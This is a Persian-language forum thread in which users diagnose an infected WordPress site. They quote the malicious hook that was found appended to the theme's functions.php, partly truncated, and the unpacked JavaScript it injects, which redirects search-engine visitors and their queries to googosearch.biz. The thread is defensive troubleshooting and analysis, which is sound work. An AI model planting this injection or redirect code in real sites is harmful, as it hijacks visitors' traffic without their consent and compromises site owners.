• پایان فعالیت بخشهای انجمن: امکان ایجاد موضوع یا نوشته جدید برای عموم کاربران غیرفعال شده است

مشکل ویروسی شدن سایت

MihanV

MihanV

مدیر بازنشسته
تاریخ عضویت
29 جولای 2010
نوشته‌ها
11,979
لایک‌ها
30,427
محل سکونت
کرج
به نقل از jowshany :
به نظرم یه سری کدها به انتهای فانکشن قالب اضافه شده بود که حذف کردم .
اما هنوز درست نشده و باز هم مروگر گیر میده بهش .
نیاز به زمان داره؟
کلیک کنید تا بازشود...

functions.php رو بزار ما هم یه نگاهی بکنیم
 
jowshany

jowshany

Registered User
تاریخ عضویت
4 مارس 2009
نوشته‌ها
1,594
لایک‌ها
270
MihanV

MihanV

مدیر بازنشسته
تاریخ عضویت
29 جولای 2010
نوشته‌ها
11,979
لایک‌ها
30,427
محل سکونت
کرج
به نقل از jowshany :
http://www.up.98ia.com/images/3pbq06jvm7ge83ci3haq.zip

اونی که no-edit-functions.php هست قبل از اینه که من ادیتش کنم .
فانکشن تنها هم کهاون کد آخرش رو حذف کردم .
کلیک کنید تا بازشود...


کد مخرب اینه که شما حذف کردی :

ادیت : کد رو ادیت کردم انتی ویروس ها نمیزاشتن باز بشه تاپیک

PHP: 
<?php 
add_action('get_footer', 'add_sscounter');
	function add_sscounter(){
		echo '<!--scounter-->';
		if(function_exists('is_user_logged_in')){
			if(time()%2 == 0 && !is_user_logged_in()){			
				echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c)
?>

حالا فایل های دیگه قالب هم چک کن این کد اضافه نشده باشه
 
Last edited:
GraphX

GraphX

Registered User
تاریخ عضویت
20 می 2009
نوشته‌ها
8,066
لایک‌ها
7,756
محل سکونت
دنيای مجازی
A

aminsm

کاربر قدیمی پرشین تولز
کاربر قدیمی پرشین تولز
تاریخ عضویت
11 سپتامبر 2005
نوشته‌ها
850
لایک‌ها
465
فرجاد جان دستت درد نکنه ،

خیلی دلم میخواست ببینم این کد چیه که تو همه سایتها پخش شده(حوصله واکشی از تو سورس صفحه رو هم نداشتم).

خیلی جالبه که وقتی می خواستم بیام تو این صفحه هم نود32 اخطار داد حتی نتونستم پستت رو نقل قول کنم.

برم ببینم کارش چیه :D
 
MihanV

MihanV

مدیر بازنشسته
تاریخ عضویت
29 جولای 2010
نوشته‌ها
11,979
لایک‌ها
30,427
محل سکونت
کرج
به نقل از aminsm :
فرجاد جان دستت درد نکنه ،

خيلي دلم ميخواست ببينم اين کد چيه که تو همه سايتها پخش شده(حوصله واکشي از تو سورس صفحه رو هم نداشتم).

خيلي جالبه که وقتي مي خواستم بيام تو اين صفحه هم نود32 اخطار داد حتي نتونستم پستت رو نقل قول کنم.

برم ببينم کارش چيه :D
کلیک کنید تا بازشود...

خواهش ميکنم عزيز
کارش ريدايرکت به googosearch.biz هست
اين جا رو ببين
ولي اينکه از کدوم پلاگين هست رو نميدونم ...
 
A

aminsm

کاربر قدیمی پرشین تولز
کاربر قدیمی پرشین تولز
تاریخ عضویت
11 سپتامبر 2005
نوشته‌ها
850
لایک‌ها
465
به نقل از MihanV :
خواهش ميکنم عزيز
کارش ريدايرکت به googosearch.biz هست
اين جا رو ببين
ولي اينکه از کدوم پلاگين هست رو نميدونم ...
کلیک کنید تا بازشود...

بله حق با شماست، هر کوئری که از موتورهای جستجو میاد با همون کوئری به googosearch.biz ریدایرکت میشه.

اینم آنپک شدش :
HTML: 
var r = document.referrer,
    t = "",
    q;
if (r.indexOf("google.") != -1) t = "q";
if (r.indexOf("msn.") != -1) t = "q";
if (r.indexOf("yahoo.") != -1) t = "p";
if (r.indexOf("altavista.") != -1) t = "q";
if (r.indexOf("aol.") != -1) t = "query";
if (r.indexOf("ask.") != -1) t = "q";
if (t.length && ((q = r.indexOf("?" + t + "=")) != -1 || (q = r.indexOf("&" + t + "=")) != -1)) window.location = "ht" + "tp" + ":/" + "/go" + "ogo" + "sea" + "rc" + "h." + "bi" + "z/s" + "ea" + "rc" + "h.p" + "hp?" + "t" + "y=1&t" + "er" + "ms=" + r.substring(q + 2 + t.length).split("&")[0];

دوستانی که سایتشون به این ویروس دچار شده (منجمله جناب روشنی) ممنون میشم اگه لیست پلاگینهاشون + اسم قالبشون(اگر عمومی و غیر اختصاصی باشه)رو اینجا لیست کنند.
 
jowshany

jowshany

Registered User
تاریخ عضویت
4 مارس 2009
نوشته‌ها
1,594
لایک‌ها
270
دوستانی که سایتشون به این ویروس دچار شده (منجمله جناب روشنی) ممنون میشم اگه لیست پلاگینهاشون + اسم قالبشون(اگر عمومی و غیر اختصاصی باشه)رو اینجا لیست کنند.
کلیک کنید تا بازشود...
والا این شاپه دوستمه و بنده هم جوشنی هستم :D

اسم قالبش هست : kala110
پلاگینها :
akismet
contact-form-7
featured-content-gallery
nextgen-gallery
post-plugin-library
random-posts-plugin
seo-automatic-links
tinymce-advanced
wp-jalali
wp-page-numbers
wp-pagenavi
wp-paging
wp-postratings
wp-postviews
wp-super-cache
 
MihanV

MihanV

مدیر بازنشسته
تاریخ عضویت
29 جولای 2010
نوشته‌ها
11,979
لایک‌ها
30,427
محل سکونت
کرج
به نقل از jowshany :
والا این شاپه دوستمه و بنده هم جوشنی هستم :D

اسم قالبش هست : kala110
پلاگینها :
akismet
contact-form-7
featured-content-gallery
nextgen-gallery
post-plugin-library
random-posts-plugin
seo-automatic-links
tinymce-advanced
wp-jalali
wp-page-numbers
wp-pagenavi
wp-paging
wp-postratings
wp-postviews
wp-super-cache
کلیک کنید تا بازشود...

توی فایل های دیگه قالب نیود این کد ؟
 
jowshany

jowshany

Registered User
تاریخ عضویت
4 مارس 2009
نوشته‌ها
1,594
لایک‌ها
270
به نقل از MihanV :
پس بک اپ رو دانلود کن تو پی سی با انتی ویروس اسکن کن ببین کدوم فایل رو گیر میده ...
کلیک کنید تا بازشود...

دیتابیس که نیاز نیست؟
فقط فایلهای پی اچ پی؟
/public_html
رو با اف تی پی دانلود کنم و اسکن کنم بهتر نیست؟
 
You must log in or register to reply here.

بک‌لینک


بالا